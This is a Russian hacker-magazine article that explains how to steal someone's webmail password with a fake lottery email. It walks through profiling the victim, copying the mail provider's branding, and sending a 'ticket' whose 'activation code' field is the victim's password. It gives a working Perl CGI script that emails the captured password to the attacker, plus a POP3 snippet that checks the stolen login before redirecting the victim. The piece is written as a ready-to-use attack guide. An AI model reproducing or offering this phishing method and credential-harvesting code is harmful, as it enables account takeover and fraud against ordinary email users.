Хотелось бы подхватить тему взлома почты, которую начал Danil. Конечно, как правильно отметил Danil, Bruteforce — это самый надежный…но самый долгий способ. Реально этот способ может сработать, если пользователь в качестве пароля использует слово из словаря, либо комбинацию 111111. Но если это не так? Средний пароль — это 6-8 символов, причем используются только малые латинские буквы. Таких букв всего 26, поэтому мы имеем от 308915776 до 208827064576 вариантов (формула расчета = количество_букв 
^количество_символов_в_пароле).

Конечно попробовать перебрать небольшой словарик никогда не помешает, а вот брутфорсить миллиарды вариантов — это уже тупо… и не спортивно. Но дело было начато хорошее, и давай его продолжим — ты наверно слышал о социальной инженерии? ОК! Тогда давай попробуем заставить «жертву» саму отдать нам свой пароль.
Какова вероятность убедить «жертву» в необходимости такого деяния? Сложно сказать — все зависит от твоей настойчивости и изобретательности. Этот метод не требует сутками сидеть в Инете, достаточно уделять разработке «жертвы» всего несколько минут, но регулярно. А чтобы не быть голословным, я дам тебе конкретный пример: 

Предположим, наша «жертва» имеет ящик на какой-нибудь бесплатной почте и читает письма через Web-интерфейс (именно так поступает большинство юзеров). 

Для взлома тебе понадобится:

  1. Html-редактор, к примеру — Microsoft Frontpage (есть в расширенной версии MS
    Office)
  2. Почтовый клиент, мы возьмем Outlook Express (есть в любой Windows)
  3. Ftp-клиент — можешь скачать гиганта вроде CuteFtp, а можешь воспользоваться и Ftp.exe, идущим опять-таки с Windows
  4. Работающая голова и творческий подход 😉

Итого выходит, что если у тебя Win + расширенный офис, то ничего больше тебе и не понадобится. Приступим?

Шаг 1:

Нужно узнать как можно больше о будущей «жертве»: пол, возраст, степень «компьютерной образованности». Причем именно уровню этой самой «образованности» я советую уделить особое внимание — она будет определять твою стратегию.

Шаг 2:

Давай будем исходить из того, что все хотят денег. Причем они совсем не против, чтобы деньги свалились на них совершенно неожиданно, скажем в виде выигрыша. Некоторые покупают лотерейные билеты, другие — играют на скачках или в казино, третьи — сидят дома и ничего не делают (не потому, что они не хотят выиграть, просто они не верят в это и поэтому им жаль денег на ту же лотерею). Ну а если эта лотерея будет бесплатной? Платить ничего не надо, а выиграть можно реальные деньги. Думаешь никто не поверит? Еще как поверит! Ведь жертва уже пользуется бесплатной почтой? Что это дает хозяевам сервера? От нашей «жертвы» вроде бы ничего, но они зарабатывают на рекламе — это наверное знает каждый пользователь бесплатного «мыла». Больше пользователей — больше денег. И тут хозяевам почтового сервиса приходит в голову идея — а почему бы ни разыгрывать среди пользователей небольшие денежные призы? «Поделится» с пользователями, чтобы этим розыгрышем привлечь еще больше людей, а значит увеличить свои доходы.

Но почему-то мысль о проведении подобных лотерей не приходит в голову нужным людям…Поэтому такую лотерею проведем мы, а единственным ее участником будет наша «жертва».

Заходим на ту бесплатную почту, которой пользуется «жертва», регистрируемся. Лучше выбрать адрес вроде: lottery@, prizes@ или что-то подобное, это особенно важно, если также предоставляется место под бесплатный сайт. Предположим, нас интересует «жертва» с почтой victim@mailru.com Заходим на сервер и видим: владелец — Hotbox.ru, кроме mailru.com у них еще pisem.net, hotchat.ru, hotbox.ru, pochtamt.ru, fromru.com, krovatka.net. ОК! Регистрируем lottery@hotbox.ru + в «нагрузку» получаем www.lottery.hotbox.ru («официальный» сайт лотереи %-).

Теперь не лишним будет зайти во вновь зарегистрированный ящик и проверить его на наличие рекламного письма, по принципу «добро пожаловать на наш сервер. Вы можете воспользоваться следующими дополнительными услугами…..». Если подобные письма высылают — тебе не надо много думать: сохраняй его на винте — примем за образец. Если такого письма не обнаружится — придется «выдрать» одну из страниц на сервере (в качестве образца «фирменного стиля»), или делать все с нуля, но «по образу и подобию». 

Шаг 3:

После осознания «фирменного дизайна» можно приступать к составлению письма «жертве». Как ты понимаешь просто отправить ему «мыло» с просьбой выслать свой пароль «в обмен на $1.000.000» — вариант тупиковый. Поэтому над письмом
придется поработать. Давай посмотрим на настоящий лотерейный билет, мы увидим:

  • Кто и зачем проводит данную лотерею
  • Правила получения выигрыша и сроки
  • Размеры выигрыша
  • Игровое поле
  • Номер билета

Видел такое? Теперь давай все воспроизведем это в нашем «письме». Только игровое поле будет в форме поля, куда надо ввести «код активации», а ниже дадим пояснением:

* Код активации билета совпадает с вашим паролем

Просто, но вместе с тем — действенно. Берем Html-редактор (Frontpage) и начинаем творить. Потом, то «выделяем» то, что получилось и «вставляем» в
Outlook. Вероятно тебе понадобится несколько
вариантов письма. Зачем? Ну на первый раз тебе могут и не поверить, тогда придется через недельку послать еще одно письмо с билетом второго «тиража», потом третьего — в общем, если человек будет регулярно получать такие ненавязчивые письма (в со второго «тиража» мы включим сведения о выигравших участниках), то он почти гарантированно захочет испытать свою удачу.

Полезный совет:

Не посылай билет в первом письме, лучше вначале послать «пробный шар» в виде рекламного письма «новости нашего сервиса»: придумай что-то вроде «на прошлой неделе число пользователей превысило 10 миллионов», «по результатам опроса на Yandex.ru наш почтовый сервис признан четвертым по популярности ресурсом Рунета», а в самом начале, чтобы бросалось в глаза, приведи информацию о том, что
планируется проводить такой-растакой розыгрыш, ждите билетов и удачи. Имея такое письмо, «жертва» наверняка быстрее осознает необходимость ввода «кода активации» 😉

Шаг 4:

Если письмо составлено надо теперь позаботиться о том, чтобы «код активации» из письма попал к нам, а жертва увидела «результаты лотереи». Для этого мы предусмотрели в письме отправку содержимого нашего билета на http://server/check.cgi Как понимаешь, теперь надо сделать сам check.cgi, вот он:

####################
#!/usr/bin/perl -w
use CGI qw(:standard);

my $mailprog = ‘/usr/sbin/sendmail’;
my $mail=’xakep@mail.ru’;
my $first = param(«first»);
my $last = param(«last»);
my $password = param(«password»);
my $target=’victim@mailru.com’;

open (MAIL, «|$mailprog -t»);
print MAIL «Content-Type: text/plain\n»;
print MAIL «Subject: YESSSS\n»;
print MAIL «To: $mail\n»;
print MAIL «From: ‘.$target.’\n\n»;
print MAIL «first is: $first»;
print MAIL «last is: $last»;
print MAIL «password is: $password»;
close (MAIL);

if (length($password)<3){
$query = CGI::new();
print $query->redirect(‘http://lottery.hotbox.ru/error.htm’);

} else {
$query = CGI::new();
print $query->redirect(‘http://lottery.hotbox.ru/check.htm’);

}
####################

Как это работает: скрипт получает значение полей «билета» и отправляет их тебе письмом (кстати, не забудь указать свой адрес). Далее скрипт смотрит длину поля password (он же «код активации»), если его длина меньше трех символов, то жертву перебрасывает на
страницу error.htm (где написано «Баклан! Код активации введен неверно!»), в противном случае — происходит перенаправление на страницу с результатом проверки билета
(check.htm).

Данный вариант скрипта, конечно, слишком прост в части проверки истинности «кода активации», но зато универсален и подходит для всех почтовых служб.

Как организовать более продвинутую проверку:
если почтовый сервис предоставляет доступ по pop3 и работа клиента через web-интерфейс не блокирует его ящик, то для проверки можно использовать следующий код:

use Net::POP3;

$host = «victim_mail.ru»;
$pop3=Net::POP3->new($host);
if ($pop3->login(«$first»,»$password»)){
###если пароль подошел переводим жертву на страницу результатов
} else {
### иначе переводим на страницу error.htm

Шаг 5:

Осталось создать только сам «официальный сайт лотереи». Для большинства «игроков» необходимо всего три простых страницы:

Титульная — большие и красивые надписи призывающие к участию в «лотерее»
Check.htm — страница, на которой «жертва» номер тиража, номер своего билета и сообщение о том, что «к сожалению билет ничего не выиграл».
Error.htm — страница цель которой напомнить «жертве» о необходимости ввода корректного «кода активации»
Думаю, этот шаг не вызовет у тебя особых проблем — юзай Frontpage + свою фантизию и все будет в порядке: нам же не в конкурсе участвовать, а всего лишь пароль получить 😉

Финальные аккорд:

У тебя могут возникнуть проблемы с размещением скрипта: где-то вообще нельзя их использовать, где-то будут запрещены внешние коннекты. Но ты можешь разместить скрипт где угодно, к примеру на virtualave.net. Подобная ситуация складывается на Hotbox.ru, где вообще нет скриптов, но при таком подходе это абсолютно не мешает.

Другая проблема — если «жертва» все-таки использует почтовый клиент, а не web-интерфейс. Тогда при отправке из почтового клиента ты просто не получишь значения «кода активации». Выход — либо сделать error.htm точной копией «билета» и просьбой ввести код активации повторно (лучший вариант), либо изменить «письмо» таким образом, что высылать не «билет», а гиперссылку на него, а саму форму «разместить на «официальном сайте» и предложить «жертве» вводить «владельца билета» самостоятельно.

А вообще вариант с «лотереей» далеко не единственный, можно придумать множество других — было бы желание и «жертва» 😉

Оставить мнение

Check Also

Целенаправленная социальная инженерия. Нестандартные техники введения в заблуждение

В предыдущей статье мы разобрали массовые атаки. Но их применимость ограничена: пентестер …